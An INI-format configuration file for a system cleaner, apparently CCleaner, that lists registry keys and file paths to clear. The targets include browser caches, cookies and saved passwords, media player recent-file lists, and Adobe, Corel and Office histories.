SpecialKey1=N_EX_JUMP_LISTS
[Network Passwords]
RegKey1=HKCU\Software\Microsoft\Ftp\Accounts
SpecialKey1=N_EX_NETWORK_PASSWORDS
SpecialKey1=R_SHARED_DLLS
SpecialKey1=R_FILE_EXTS
SpecialKey1=R_ACTIVEX
SpecialKey1=R_INTERFACE
SpecialKey1=R_APP_OPENWITH
SpecialKey1=R_FONTS
SpecialKey1=R_APP_PATHS
SpecialKey1=R_HELP
SpecialKey1=R_INSTALLER
SpecialKey1=R_OLDSOFTWARE
SpecialKey1=R_RUNSTARTUP
SpecialKey1=R_STARTMENUORDER
SpecialKey1=R_MUICACHE
SpecialKey1=R_SOUND_EVENTS
[Windows Services]
SpecialKey1=R_WINDOWS_SERVICES
; called winapp2.ini which follows the same format as this one.
; 3025 = Windows
; 3026 = Firefox/Mozilla
; 3027 = Opera
; 3029 = Google Chrome
; 3031 = Windows Store
[Mozilla - Internet Cache]
SpecialDetect=DET_MOZILLA
SpecialKey1=N_MOZ_CACHE
[Mozilla - Internet History]
SpecialKey1=N_MOZ_HISTORY
[Mozilla - Download History]
SpecialKey1=N_MOZ_DOWNLOAD
[Mozilla - Cookies]
SpecialKey1=N_MOZ_COOKIES
[Mozilla - Saved Form Information]
SpecialKey1=N_MOZ_FORM
[Mozilla - Saved Passwords]
SpecialKey1=N_MOZ_PASSWORD
[Mozilla - Session]
SpecialKey1=N_MOZ_SESSION
[Mozilla - Site Preferences]
SpecialKey1=N_MOZ_SITE_PREFERENCES
[Mozilla - Compact Databases]
SpecialKey1=N_MOZ_COMPACT_DATABASES
SpecialKey1=N_THUNDERBIRD_CACHE
SpecialKey1=N_THUNDERBIRD_HISTORY
SpecialKey1=N_THUNDERBIRD_DOWNLOAD
SpecialKey1=N_THUNDERBIRD_COOKIES
SpecialKey1=N_THUNDERBIRD_FORM
[Thunderbird - Saved Passwords]
SpecialKey1=N_THUNDERBIRD_PASSWORD
SpecialKey1=N_THUNDERBIRD_SESSION
SpecialKey1=N_THUNDERBIRD_SITE_PREFERENCES
SpecialKey1=N_THUNDERBIRD_COMPACT_DATABASES
[Opera - Internet Cache]
SpecialDetect=DET_OPERA
SpecialKey1=N_OPERA_CACHE
[Opera - Internet History]
SpecialKey1=N_OPERA_HISTORY
[Opera - Cookies]
SpecialKey1=N_OPERA_COOKIES
[Opera - Download History]
SpecialKey1=N_OPERA_DOWNLOAD
[Opera - Recently Typed URLs]
SpecialKey1=N_OPERA_RECENTLY_TYPED_URLS
[Opera - Last Download Location]
SpecialKey1=N_OPERA_LAST_DOWNLOAD_LOCATION
[Opera - Saved Passwords]
SpecialKey1=N_OPERA_PASSWORD
[Opera - Session]
SpecialKey1=N_OPERA_SESSION
[Opera - Saved Form Information]
SpecialKey1=N_OPERA_FORM
[Opera - Website Icons]
SpecialKey1=N_OPERA_WEBSITE_ICONS
[Opera - Compact Databases]
SpecialKey1=N_OPERA_COMPACT_DATABASES
DetectFile=%ProgramFiles%\Safari\Safari.exe
FileKey1=%localappdata%\Apple Computer\Safari|Cache.db
FileKey1=%appdata%\Apple Computer\Safari|History.plist
FileKey2=%appdata%\Apple Computer\Safari|LastSession.plist
FileKey3=%appdata%\Apple Computer\Safari|TopSites.plist
FileKey4=%appdata%\Apple Computer\Safari|Downloads.plist
FileKey5=%localappdata%\Apple Computer\Safari\History|*.*
FileKey6=%localappdata%\Apple Computer\Safari\Webpage Previews|*.*|RECURSE
SpecialKey1=N_SAFARI_HISTORY
SpecialKey1=N_SAFARI_COOKIES
FileKey1=%appdata%\Apple Computer\Safari|Form Values.plist
[Safari - Saved Passwords]
SpecialDetect=DET_SAFARI_PASSWORD
SpecialKey1=N_SAFARI_PASSWORD
[Google Chrome - Internet Cache]
SpecialDetect=DET_CHROME
SpecialKey1=N_CHROME_CACHE
[Google Chrome - Internet History]
Section = Chrome
SpecialKey1=N_CHROME_HISTORY
[Google Chrome - Download History]
SpecialKey1=N_CHROME_DOWNLOAD
[Google Chrome - Last Download Location]
SpecialKey1=N_CHROME_LAST_DOWNLOAD_LOCATION
[Google Chrome - Cookies]
SpecialKey1=N_CHROME_COOKIES
[Google Chrome - Saved Form Information]
SpecialKey1=N_CHROME_FORM
[Google Chrome - Saved Passwords]
SpecialKey1=N_CHROME_PASSWORD
[Google Chrome - Session]
SpecialKey1=N_CHROME_SESSION
[Google Chrome - Compact Databases]
SpecialKey1=N_CHROME_COMPACT_DATABASES
RegKey1=HKCU\Software\Adobe\Acrobat Reader\5.0\AVGeneral\cRecentFiles
RegKey1=HKCU\Software\Adobe\Acrobat Reader\6.0\AVGeneral\cRecentFiles
RegKey1=HKCU\Software\Adobe\Acrobat Reader\7.0\AVGeneral\cRecentFiles
FileKey1=%localappdata%\Adobe\Acrobat\7.0\Cache\Search70|*.*
FileKey2=%ProgramFiles%\Adobe\Acrobat 7.0\Reader|*.bak
FileKey3=%ProgramFiles%\Adobe\Acrobat 7.0\ActiveX|*.bak
FileKey4=%ProgramFiles%\Adobe\Acrobat 7.0\Reader\plug_ins|*.bak
FileKey5=%ProgramFiles%\Adobe\Acrobat 7.0\Reader\Updater|*.bak
RegKey1=HKCU\Software\Adobe\Acrobat Reader\8.0\AVGeneral\cRecentFiles
FileKey1=%localappdata%\Adobe\Acrobat\8.0\Cache\Search80|*.*
RegKey1=HKCU\Software\Adobe\Acrobat Reader\9.0\AVGeneral\cRecentFiles
FileKey1=%LocalAppData%\Adobe\Acrobat\9.0\Cache\Search|*.*
FileKey2=%LocalLowAppData%\Adobe\Acrobat\9.0\Search|*.*
RegKey1=HKCU\Software\Adobe\Acrobat Reader\10.0\AVGeneral\cRecentFiles
FileKey1=%LocalAppData%\Adobe\Acrobat\10.0\Cache\Search|*.*
FileKey2=%LocalLowAppData%\Adobe\Acrobat\10.0\Search|*.*
RegKey1=HKCU\Software\Adobe\Acrobat Reader\11.0\AVGeneral\cRecentFiles
FileKey1=%LocalAppData%\Adobe\Acrobat\11.0\Cache\Search|*.*
FileKey2=%LocalLowAppData%\Adobe\Acrobat\11.0\Search|*.*
RegKey1=HKCU\Software\Adobe\Adobe Acrobat\8.0\AVGeneral\cRecentFiles
RegKey1=HKCU\Software\Adobe\Adobe Acrobat\9.0\AVGeneral\cRecentFiles
FileKey3=%LocalAppData%\Adobe\Acrobat\9.0\Cache|*.lst
RegKey1=HKCU\Software\Adobe\Adobe Acrobat\10.0\AVGeneral\cRecentFiles
FileKey3=%LocalAppData%\Adobe\Acrobat\10.0\Cache|*.lst
RegKey1=HKCU\Software\Adobe\Adobe Acrobat\11.0\AVGeneral\cRecentFiles
RegKey2=HKCU\Software\Adobe\Adobe Acrobat\11.0\CompoundDocs\cStoredBinder
FileKey1=%LocalAppData%\Adobe\Acrobat\11.0\Cache\|*.*
RegKey1=HKCU\Software\Adobe\ImageReady 7.0\Preferences\URLHistory
RegKey2=HKCU\Software\Adobe\ImageReady 7.0\Preferences|SaveDir
RegKey3=HKCU\Software\Adobe\ImageReady 7.0\Preferences\RecentFiles
RegKey1=HKCU\Software\Adobe\ImageReady 8.0\Preferences\URLHistory
RegKey2=HKCU\Software\Adobe\ImageReady 8.0\Preferences|SaveDir
RegKey3=HKCU\Software\Adobe\ImageReady 8.0\Preferences\RecentFiles
RegKey1=HKCU\Software\Adobe\Photoshop\6.0\VisitedDirs
RegKey1=HKCU\Software\Adobe\Photoshop\7.0\VisitedDirs
RegKey1=HKCU\Software\Adobe\Photoshop\8.0\VisitedDirs
RegKey1=HKCU\Software\Adobe\Photoshop\9.0\VisitedDirs
RegKey2=HKCU\Software\Adobe\MediaBrowser\MRU\Photoshop\FileList
FileKey1=%appdata%\Adobe\CameraRaw\Cache|*.*
RegKey1=HKCU\Software\Adobe\Photoshop\10.0\VisitedDirs
RegKey1=HKCU\Software\Adobe\Photoshop\11.0\VisitedDirs
RegKey1=HKCU\Software\Adobe\Photoshop\12.0\VisitedDirs
RegKey1=HKCU\Software\Adobe\Photoshop\60.0\VisitedDirs
RegKey1=HKCU\Software\Adobe\Elements Organizer\12.0\CurrentMediaFilePath
RegKey2=HKCU\Software\Adobe\Photoshop Elements\12.0\CurrentMediaFilePath
RegKey3=HKCU\Software\Adobe\Photoshop Elements\12.0\common\settings\Elements MRU
RegKey4=HKCU\Software\Adobe\Photoshop Elements\12.0\VisitedDirs|STARTUPIMAGEDIRECTORY
FileKey1=%CommonAppData%\Adobe\Photoshop Elements\12.0\Locale\*_*\Photo Creations\temp|*.dat
FileKey2=%AppData%\Adobe\Elements Organizer\12.0\Organizer|Log.txt
FileKey3=%CommonAppData%\Adobe\Elements Organizer\Catalogs\My Catalog|face.thumb.9.cache;thumb.5.cache
RegKey1=HKCU\Software\Adobe\MediaBrowser\MRU\illustrator\FileList
FileKey1=%LocalAppData%\Adobe\Air\Logs|*.*
RegKey1=HKCU\Software\Adobe\MediaBrowser\MRU\Dreamweaver\FileList
RegKey2=HKCU\Software\Adobe\Dreamweaver CS6\Recent File List
FileKey1=%ProgramFiles%\Adobe\Adobe Premiere Pro CC\cache|*-*-*.cache
FileKey2=%ProgramFiles%\Adobe\Adobe Premiere Pro CC\Required\data\cache|*.pcache
FileKey3=%AppData%\Adobe\dynamiclinkmanager\7.0\logs|*.log
FileKey4=%AppData%\Adobe\Lumetri\7.0\log|*.log
FileKey5=%AppData%\Adobe\Premiere Pro\7.0\logs|*.log
FileKey6=%AppData%\Adobe\Premiere Pro\7.0|Plugin Loading.log
FileKey7=%AppData%\Adobe\Common\Media Cache Files|*.mediasrc
FileKey8=%AppData%\Adobe\Common\Media Cache|*.mediasrc
RegKey1=HKCU\Software\Adobe\Premiere Elements\12.0\MRUDocuments
FileKey1=%AppData%\Adobe\Common\Thumbnail Cache|thumbnailDB
FileKey2=%AppData%\Adobe\Premiere Elements\12.0\logs|*.log
FileKey3=%AppData%\Adobe\Premiere Elements\12.0|Plugin Loading.log;CAHeadless Plugin Loading.log
FileKey4=%AppData%\Adobe\Premiere Elements 12.0\12.0\logs|*.log
FileKey1=%AppData%\Adobe\Acrobat\Distiller 10|messages.log
FileKey2=%AppData%\Adobe\Acrobat\Distiller 10\Cache|*.*|RECURSE
DetectFile=%ProgramFiles%\AdvancedSearchbar\advancedsearchbar.dll
FileKey1=%ProgramFiles%\AdvancedSearchbar\Cache|*.*
RegKey1=HKCU\Software\Advanced Searchbar\Toolbar\Historysearchbox1
RegKey1=HKCU\Software\Yahoo\Companion\SearchHistory
[Windows Live Toolbar]
RegKey1=HKCU\Software\Microsoft\MSN Apps\SearchBox|History
RegKey2=HKCU\Software\Microsoft\MSN Apps\MSN Toolbar|SearchStrings
RegKey1=HKCU\Software\Google\NavClient\1.1\History
RegKey2=HKCU\Software\Google\NavClient\1.1\Options|KillPopupCount
FileKey1=%appdata%\Google\Local Search History|*.*
RegKey1=HKCU\Software\Google\Deskbar\termhistory
RegKey2=HKCU\Software\Google\Deskbar\urlhistory
FileKey1=%localappdata%\Google\Google Calendar Sync\logs|*.log
FileKey1=%localappdata%\Google\Google Talk\status|*.txt
FileKey2=%localappdata%\Google\Google Talk\chatlogs|*.log
FileKey1=%AppData%\Christofer Persson\Kantaris Media Player|*.jpg
RegKey1=HKCU\Software\KMPlayer\KMP2.0|LastFileName
RegKey2=HKCU\Software\KMPlayer\WideAlbum\(Default Album)
RegKey3=HKCU\Software\KMPlayer\albumart|LastAlbumName
[Windows Media Player]
RegKey1=HKCU\Software\Microsoft\MediaPlayer\Player\RecentFileList
RegKey2=HKCU\Software\Microsoft\MediaPlayer\Player\RecentURLList
RegKey3=HKCU\Software\Microsoft\MediaPlayer\Preferences|LastPlayList
RegKey4=HKCU\Software\Microsoft\MediaPlayer\Preferences|LastPlayListIndex
RegKey5=HKCU\Software\Microsoft\MediaPlayer\Player\Settings|SaveAsDir
RegKey6=HKCU\Software\Microsoft\MediaPlayer\AutoComplete\MediaEdit
RegKey7=HKCU\Software\Microsoft\MediaPlayer\Radio\MRUList
RegKey8=HKCU\Software\Microsoft\MediaPlayer\Services\MediaGuide|CachedIconPath
RegKey9=HKCU\Software\Microsoft\MediaPlayer\Services\MediaGuide|CachedLargeLogoPath
FileKey1=%LocalAppData%\Microsoft\Media Player|lastplayed.wpl
FileKey2=%LocalAppData%\Microsoft\Media Player|cacheentry*.*|RECURSE
FileKey3=%LocalAppData%\Microsoft\Media Player\Art Cache\LocalMLS|*.*|RECURSE
FileKey4=%LocalAppData%\Microsoft\Media Player\Transcoded Files Cache|*.*|RECURSE
[Windows Media Center]
DetectFile=%windir%\ehome\ehshell.exe
FileKey1=%CommonAppData%\Microsoft\eHome\logs|*.*
FileKey2=%LocalAppData%\Microsoft\eHome|playlistcache.db
FileKey3=%PUBLIC%\Recorded TV\TempRec\TempSBE|*.*|RECURSE
RegKey1=HKCU\Software\RealNetworks\RealPlayer\6.0\Preferences\MostRecentClips1
RegKey2=HKCU\Software\RealNetworks\RealPlayer\6.0\Preferences\MostRecentClips2
RegKey3=HKCU\Software\RealNetworks\RealPlayer\6.0\Preferences\MostRecentClips3
RegKey4=HKCU\Software\RealNetworks\RealPlayer\6.0\Preferences\MostRecentClips4
RegKey5=HKCU\Software\RealNetworks\RealPlayer\6.0\Preferences\MostRecentClips5
RegKey6=HKCU\Software\RealNetworks\RealPlayer\6.0\Preferences\MostRecentClips6
RegKey7=HKCU\Software\RealNetworks\RealPlayer\6.0\Preferences\MostRecentClips7
RegKey8=HKCU\Software\RealNetworks\RealPlayer\6.0\Preferences\MostRecentClips8
RegKey9=HKCU\Software\RealNetworks\RealPlayer\6.0\Preferences\MostRecentSkins1
RegKey10=HKCU\Software\RealNetworks\RealPlayer\6.0\Preferences\MostRecentSkins2
RegKey11=HKCU\Software\RealNetworks\RealPlayer\6.0\Preferences\MostRecentSkins3
RegKey12=HKCU\Software\RealNetworks\RealPlayer\6.0\Preferences\MostRecentSkins4
RegKey13=HKCU\Software\RealNetworks\RealPlayer\6.0\Preferences\MostRecentSkins5
RegKey14=HKCU\Software\RealNetworks\RealPlayer\6.0\Preferences\MostRecentSkins6
RegKey15=HKCU\Software\RealNetworks\RealPlayer\6.0\Preferences\MostRecentSkins7
RegKey16=HKCU\Software\RealNetworks\RealPlayer\6.0\Preferences\MostRecentSkins8
RegKey17=HKCU\Software\RealNetworks\RealPlayer\6.0\Preferences\LastOpenFileDir
RegKey18=HKCU\Software\RealNetworks\RealPlayer\6.0\Preferences\OpenLocationClips1
RegKey19=HKCU\Software\RealNetworks\RealPlayer\6.0\Preferences\OpenLocationClips2
RegKey20=HKCU\Software\RealNetworks\RealPlayer\6.0\Preferences\OpenLocationClips3
RegKey21=HKCU\Software\RealNetworks\RealPlayer\6.0\Preferences\OpenLocationClips4
RegKey22=HKCU\Software\RealNetworks\RealPlayer\6.0\Preferences\OpenLocationClips5
RegKey23=HKCU\Software\RealNetworks\RealPlayer\6.0\Preferences\OpenLocationClips6
RegKey24=HKCU\Software\RealNetworks\RealPlayer\6.0\Preferences\OpenLocationClips7
FileKey1=%AppData%\Real\RealOne Player|cookies.txt;ctd.dat;realplayer.ste
FileKey2=%AppData%\Real\RealOne Player\History|*.*
FileKey3=%AppData%\Real\RealPlayer|cookies.txt;ctd.dat;realplayer.ste
FileKey4=%AppData%\Real\RealPlayer\History|*.*
FileKey5=%AppData%\Real\RealPlayer\ErrorLogs|*.*
FileKey6=%AppData%\Real\RealPlayer\WatchFolders|*.log|RECURSE
FileKey7=%ProgramFiles%\Common Files\Real\Update_OB|RealPlayer-log.txt
RegKey1=HKCU\Software\RealNetworks\RealPlayer\12.0\Preferences\MostRecentClips1
RegKey2=HKCU\Software\RealNetworks\RealPlayer\12.0\Preferences\MostRecentClips2
RegKey3=HKCU\Software\RealNetworks\RealPlayer\12.0\Preferences\MostRecentClips3
RegKey4=HKCU\Software\RealNetworks\RealPlayer\12.0\Preferences\MostRecentClips4
RegKey5=HKCU\Software\RealNetworks\RealPlayer\12.0\Preferences\MostRecentClips5
RegKey6=HKCU\Software\RealNetworks\RealPlayer\12.0\Preferences\MostRecentClips6
RegKey7=HKCU\Software\RealNetworks\RealPlayer\12.0\Preferences\MostRecentClips7
RegKey8=HKCU\Software\RealNetworks\RealPlayer\12.0\Preferences\MostRecentClips8
RegKey9=HKCU\Software\RealNetworks\RealPlayer\12.0\Preferences\MostRecentSkins1
RegKey10=HKCU\Software\RealNetworks\RealPlayer\12.0\Preferences\MostRecentSkins2
RegKey11=HKCU\Software\RealNetworks\RealPlayer\12.0\Preferences\MostRecentSkins3
RegKey12=HKCU\Software\RealNetworks\RealPlayer\12.0\Preferences\MostRecentSkins4
RegKey13=HKCU\Software\RealNetworks\RealPlayer\12.0\Preferences\MostRecentSkins5
RegKey14=HKCU\Software\RealNetworks\RealPlayer\12.0\Preferences\MostRecentSkins6
RegKey15=HKCU\Software\RealNetworks\RealPlayer\12.0\Preferences\MostRecentSkins7
RegKey16=HKCU\Software\RealNetworks\RealPlayer\12.0\Preferences\MostRecentSkins8
RegKey17=HKCU\Software\RealNetworks\RealPlayer\12.0\Preferences\LastOpenFileDir
RegKey18=HKCU\Software\RealNetworks\RealPlayer\12.0\Preferences\OpenLocationClips1
RegKey19=HKCU\Software\RealNetworks\RealPlayer\12.0\Preferences\OpenLocationClips2
RegKey20=HKCU\Software\RealNetworks\RealPlayer\12.0\Preferences\OpenLocationClips3
RegKey21=HKCU\Software\RealNetworks\RealPlayer\12.0\Preferences\OpenLocationClips4
RegKey22=HKCU\Software\RealNetworks\RealPlayer\12.0\Preferences\OpenLocationClips5
RegKey23=HKCU\Software\RealNetworks\RealPlayer\12.0\Preferences\OpenLocationClips6
RegKey24=HKCU\Software\RealNetworks\RealPlayer\12.0\Preferences\OpenLocationClips7
RegKey25=HKCU\Software\RealNetworks\RealConverter\12.0\Preferences\BrowsePath
RegKey26=HKCU\Software\RealNetworks\RealConverter\12.0\Preferences\DestinationPath
RegKey27=HKCU\Software\RealNetworks\RealTrimmer\12.0\Preferences\BrowsePath
FileKey1=%AppData%\Real\RealPlayer|cookies.txt;ctd.dat;realplayer.ste;RealPlayer-log.txt
FileKey2=%AppData%\Real\RealPlayer\History|*.*
FileKey3=%AppData%\Real\RealPlayer\ErrorLogs|*.*
FileKey4=%AppData%\Real\RealPlayer\WatchFolders|*.log|RECURSE
RegKey1=HKCU\Software\RealNetworks\RealPlayer\15.0\Preferences\MostRecentClips1
RegKey2=HKCU\Software\RealNetworks\RealPlayer\15.0\Preferences\MostRecentClips2
RegKey3=HKCU\Software\RealNetworks\RealPlayer\15.0\Preferences\MostRecentClips3
RegKey4=HKCU\Software\RealNetworks\RealPlayer\15.0\Preferences\MostRecentClips4
RegKey5=HKCU\Software\RealNetworks\RealPlayer\15.0\Preferences\MostRecentClips5
RegKey6=HKCU\Software\RealNetworks\RealPlayer\15.0\Preferences\MostRecentClips6
RegKey7=HKCU\Software\RealNetworks\RealPlayer\15.0\Preferences\MostRecentClips7
RegKey8=HKCU\Software\RealNetworks\RealPlayer\15.0\Preferences\MostRecentClips8
RegKey9=HKCU\Software\RealNetworks\RealPlayer\15.0\Preferences\LastOpenFileDir
RegKey10=HKCU\Software\RealNetworks\RealConverter\15.0\Preferences\BrowsePath
RegKey11=HKCU\Software\RealNetworks\RealConverter\15.0\Preferences\DestinationPath
RegKey12=HKCU\Software\RealNetworks\RealTrimmer\15.0\Preferences\BrowsePath
FileKey1=%AppData%\Real\RealPlayer|realplayer.ste;RealPlayer-log.txt
FileKey4=%AppData%\Real\RealPlayer\WatchFolders|*.log
RegKey1=HKCU\Software\RealNetworks\RealPlayer\16.0\Preferences\MostRecentClips1
RegKey2=HKCU\Software\RealNetworks\RealPlayer\16.0\Preferences\MostRecentClips2
RegKey3=HKCU\Software\RealNetworks\RealPlayer\16.0\Preferences\MostRecentClips3
RegKey4=HKCU\Software\RealNetworks\RealPlayer\16.0\Preferences\MostRecentClips4
RegKey5=HKCU\Software\RealNetworks\RealPlayer\16.0\Preferences\MostRecentClips5
RegKey6=HKCU\Software\RealNetworks\RealPlayer\16.0\Preferences\MostRecentClips6
RegKey7=HKCU\Software\RealNetworks\RealPlayer\16.0\Preferences\MostRecentClips7
RegKey8=HKCU\Software\RealNetworks\RealPlayer\16.0\Preferences\MostRecentClips8
RegKey9=HKCU\Software\RealNetworks\RealPlayer\16.0\Preferences\LastOpenFileDir
RegKey10=HKCU\Software\RealNetworks\RealConverter\16.0\Preferences\BrowsePath
RegKey11=HKCU\Software\RealNetworks\RealConverter\16.0\Preferences\DestinationPath
RegKey12=HKCU\Software\RealNetworks\RealTrimmer\16.0\Preferences\BrowsePath
RegKey1=HKCU\Software\RealNetworks\RealPlayer\17.0\Preferences\MostRecentClips1
RegKey2=HKCU\Software\RealNetworks\RealPlayer\17.0\Preferences\MostRecentClips2
RegKey3=HKCU\Software\RealNetworks\RealPlayer\17.0\Preferences\MostRecentClips3
RegKey4=HKCU\Software\RealNetworks\RealPlayer\17.0\Preferences\MostRecentClips4
RegKey5=HKCU\Software\RealNetworks\RealPlayer\17.0\Preferences\MostRecentClips5
RegKey6=HKCU\Software\RealNetworks\RealPlayer\17.0\Preferences\MostRecentClips6
RegKey7=HKCU\Software\RealNetworks\RealPlayer\17.0\Preferences\MostRecentClips7
RegKey8=HKCU\Software\RealNetworks\RealPlayer\17.0\Preferences\MostRecentClips8
RegKey9=HKCU\Software\RealNetworks\RealPlayer\17.0\Preferences\LastOpenFileDir
RegKey10=HKCU\Software\RealNetworks\RealPlayer\17.0\Preferences\OpenLocationClips1
RegKey11=HKCU\Software\RealNetworks\RealPlayer\17.0\Preferences\OpenLocationClips2
RegKey12=HKCU\Software\RealNetworks\RealPlayer\17.0\Preferences\OpenLocationClips3
RegKey13=HKCU\Software\RealNetworks\RealPlayer\17.0\Preferences\OpenLocationClips4
RegKey14=HKCU\Software\RealNetworks\RealPlayer\17.0\Preferences\OpenLocationClips5
RegKey15=HKCU\Software\RealNetworks\RealPlayer\17.0\Preferences\OpenLocationClips6
RegKey16=HKCU\Software\RealNetworks\RealPlayer\17.0\Preferences\OpenLocationClips7
FileKey1=%AppData%\Real\RealPlayer\Temp|*.*
FileKey2=%ProgramFiles%\Real\RealPlayer\RPDS|install.log
FileKey3=%CommonAppData%\Real\RealPlayer|*-log.txt;S-*
FileKey4=%CommonAppData%\RPDS\Content\images|*.jpg
FileKey5=%CommonAppData%\Real\RPDS\Logs|*.log;error.log*
FileKey6=%AppData%\Real\RealPlayer|RealPlayer-log.txt
FileKey7=%AppData%\Real\RealPlayer\ErrorLogs|*.log
FileKey8=%AppData%\Real\RealPlayer\History|*.*
FileKey9=%AppData%\Real\RealPlayer\ThumbsCache|*.*|RECURSE
FileKey10=%AppData%\Real\RealPlayer\WatchFolders|*_scan*
FileKey11=%ProgramFiles%\Real\RealPlayer\common|cookies.txt
ExcludeKey1=FILE|%AppData%\Real\RealPlayer\WatchFolders\*scan.out
RegKey1=HKLM\Software\Apple Computer, Inc.\QuickTime\Recent Movies
FileKey1=%LocalLowAppData%\Apple Computer\QuickTime\downloads|*.*|RECURSE
FileKey2=%localappdata%\Apple Computer\QuickTime\downloads|*.*|RECURSE
FileKey3=%localappdata%\Apple Computer\QuickTime|QTPlayerSession.xml
FileKey4=%appdata%\Apple Computer\QuickTime|QTPlayerSession.xml
FileKey5=%CommonAppData%\Apple Computer\Installer Cache\QuickTime*|QuickTime.msi.backup
FileKey6=%userprofile%|QTPlayerSession.xml
Detect=HKCU\Software\Andrei Jefremov\AVIPreview by Andrei Jefremov, visit VVV.avipreview.com for more
RegKey1=HKCU\Software\Andrei Jefremov\AVIPreview by Andrei Jefremov, visit VVV.avipreview.com for more\Recent File List
DetectFile=%ProgramFiles%\Steam\Steam.exe
FileKey1=%ProgramFiles%\Steam|*.mdmp;*.log
FileKey2=%ProgramFiles%\Steam\Dumps|*.*|RECURSE
FileKey3=%ProgramFiles%\Steam\Logs|*.*|RECURSE
DetectFile=%ProgramFiles%\Xfire\Xfire.exe
FileKey1=%CommonAppData%\Xfire|*-*-*-*-*-*-*.log;xfire_exe_log.txt;xfire_toucan_log.txt
FileKey2=%ProgramFiles%\Xfire|*-*-*-*-*-*-*.log;xfire_exe_log.txt;xfire_toucan_log.txt
RegKey1=HKCU\Software\Altova\XML Spy\Recent File List
RegKey2=HKCU\Software\Altova\XML Spy\Recent Project List
DetectFile=%AppData%\com.oxygenxml\
FileKey1=%AppData%\com.oxygenxml\usageData|usageData.xml
FileKey2=%AppData%\com.oxygenxml|file.history
FileKey3=%AppData%\com.oxygenxml|project.history
RegKey1=HKCU\Software\DJJ Holdings\SWiSH\Recent File List
RegKey1=HKCU\Software\Jasc\Paint Shop Pro 7\Recent File List
RegKey2=HKCU\Software\Jasc\Animation Shop 3\Recent File List
RegKey3=HKCU\Software\Jasc\Paint Shop Pro 7\General|FolderHistory
RegKey4=HKCU\Software\Jasc\Paint Shop Pro 7\General|SaveAsDirectory
RegKey5=HKCU\Software\Jasc\Paint Shop Pro 7\General|SaveCopyDirectory
RegKey1=HKCU\Software\Jasc\Paint Shop Pro 8\Recent File List
RegKey2=HKCU\Software\Jasc\Paint Shop Pro 8\WorkspaceMRU
RegKey3=HKCU\Software\Jasc\Paint Shop Pro 8\JascCmdPyScript\RunScript|FileName
RegKey4=HKCU\Software\Jasc\Paint Shop Pro 8\JascCmdFile\FileSaveAs|FileFolder
RegKey5=HKCU\Software\Jasc\Paint Shop Pro 8\JascCmdNonGraphic\SaveWorkspace|WorkspaceFilename
RegKey6=HKCU\Software\Jasc\Paint Shop Pro 8\ScriptMRU
RegKey1=HKCU\Software\Jasc\Paint Shop Pro 9\Recent File List
RegKey2=HKCU\Software\Jasc\Paint Shop Pro 9\WorkspaceMRU
RegKey3=HKCU\Software\Jasc\Paint Shop Pro 9\JascCmdFile\FileSaveAs|FileFolder
RegKey4=HKCU\Software\Jasc\Paint Shop Pro 9\JascCmdFile\FileOpen|Folder
RegKey1=HKCU\Software\Corel\Paint Shop Pro\10\Recent File List
RegKey2=HKCU\Software\Corel\Paint Shop Pro\10\WorkspaceMRU
RegKey3=HKCU\Software\Corel\Paint Shop Pro\10\CmdFile\FileSaveAs|FileFolder
RegKey4=HKCU\Software\Corel\Paint Shop Pro\10\CmdFile\FileOpen|Folder
RegKey1=HKCU\Software\Corel\Paint Shop Pro\11\Recent File List
RegKey2=HKCU\Software\Corel\Paint Shop Pro\11\WorkspaceMRU
RegKey3=HKCU\Software\Corel\Paint Shop Pro\11\CmdFile\FileSaveAs|FileFolder
RegKey4=HKCU\Software\Corel\Paint Shop Pro\11\CmdFile\FileOpen|Folder
RegKey1=HKCU\Software\Corel\Paint Shop Pro\12\Recent File List
RegKey2=HKCU\Software\Corel\Paint Shop Pro\12\WorkspaceMRU
RegKey3=HKCU\Software\Corel\Paint Shop Pro\12\CmdFile\FileSaveAs|FileFolder
RegKey4=HKCU\Software\Corel\Paint Shop Pro\12\CmdFile\FileOpen|Folder
RegKey5=HKCU\Software\Corel\Paint Shop Pro\12.5\Recent File List
RegKey6=HKCU\Software\Corel\Paint Shop Pro\12.5\WorkspaceMRU
RegKey7=HKCU\Software\Corel\Paint Shop Pro\12.5\CmdFile\FileSaveAs|FileFolder
RegKey8=HKCU\Software\Corel\Paint Shop Pro\12.5\CmdFile\FileOpen|Folder
RegKey1=HKCU\Software\Corel\Paint Shop Pro\13\Recent File List
RegKey2=HKCU\Software\Corel\Paint Shop Pro\13\WorkspaceMRU
RegKey3=HKCU\Software\Corel\Paint Shop Pro\13\CmdFile\FileSaveAs|FileFolder
RegKey4=HKCU\Software\Corel\Paint Shop Pro\13\CmdFile\FileOpen|Folder
RegKey1=HKCU\Software\Corel\PaintShop Pro\X4\Recent File List
RegKey2=HKCU\Software\Corel\PaintShop Pro\X4\UI Customization\EN\WorkspaceMRU
RegKey3=HKCU\Software\Corel\PaintShop Pro\X4\CmdFile\FileSaveAs|FileFolder
RegKey4=HKCU\Software\Corel\PaintShop Pro\X4\CmdFile\FileOpen|Folder
RegKey5=HKCU\Software\Corel\PaintShop Pro\X4\ScriptMRU
RegKey1=HKCU\Software\Corel\PaintShop Pro\X5\Recent File List
RegKey2=HKCU\Software\Corel\PaintShop Pro\X5\UI Customization\EN\WorkspaceMRU
RegKey3=HKCU\Software\Corel\PaintShop Pro\X5\CmdFile\FileSaveAs|FileFolder
RegKey4=HKCU\Software\Corel\PaintShop Pro\X5\CmdFile\FileOpen|Folder
RegKey5=HKCU\Software\Corel\PaintShop Pro\X5\ScriptMRU
RegKey1=HKCU\Software\Corel\PaintShop Pro\X6\Recent File List
RegKey2=HKCU\Software\Corel\PaintShop Pro\X6\CmdFile\FileSaveAs|FileFolder
RegKey3=HKCU\Software\Corel\PaintShop Pro\X6\CmdFile\FileOpen|Folder
RegKey4=HKCU\Software\Corel\PaintShop Pro\X6\ScriptMRU
FileKey1=%ProgramFiles%\Corel\Corel PaintShop Pro X6\PlugIns\*|*.log
FileKey2=%LocalAppData%\Corel PaintShop Pro\16.0\Thumbs|*.*|RECURSE
RegKey1=HKCU\Software\Microsoft\Works\4.0\Recent File List
FileKey1=%appdata%\Microsoft\Office\Recent|*.*
RegKey1=HKCU\Software\Microsoft\Office\8.0\Excel\Recent File List
RegKey2=HKCU\Software\Microsoft\Office\8.0\Project\Recent File List
RegKey3=HKCU\Software\Microsoft\Office\8.0\PowerPoint\Recent File List
RegKey4=HKCU\Software\Microsoft\Office\8.0\PowerPoint\Recent Folder List
RegKey5=HKCU\Software\Microsoft\Office\8.0\Common\Internet\LocationOfComponents
RegKey6=HKCU\Software\Microsoft\Office\8.0\Access\Settings
RegKey1=HKCU\Software\Microsoft\Office\10.0\PowerPoint\Recent File List
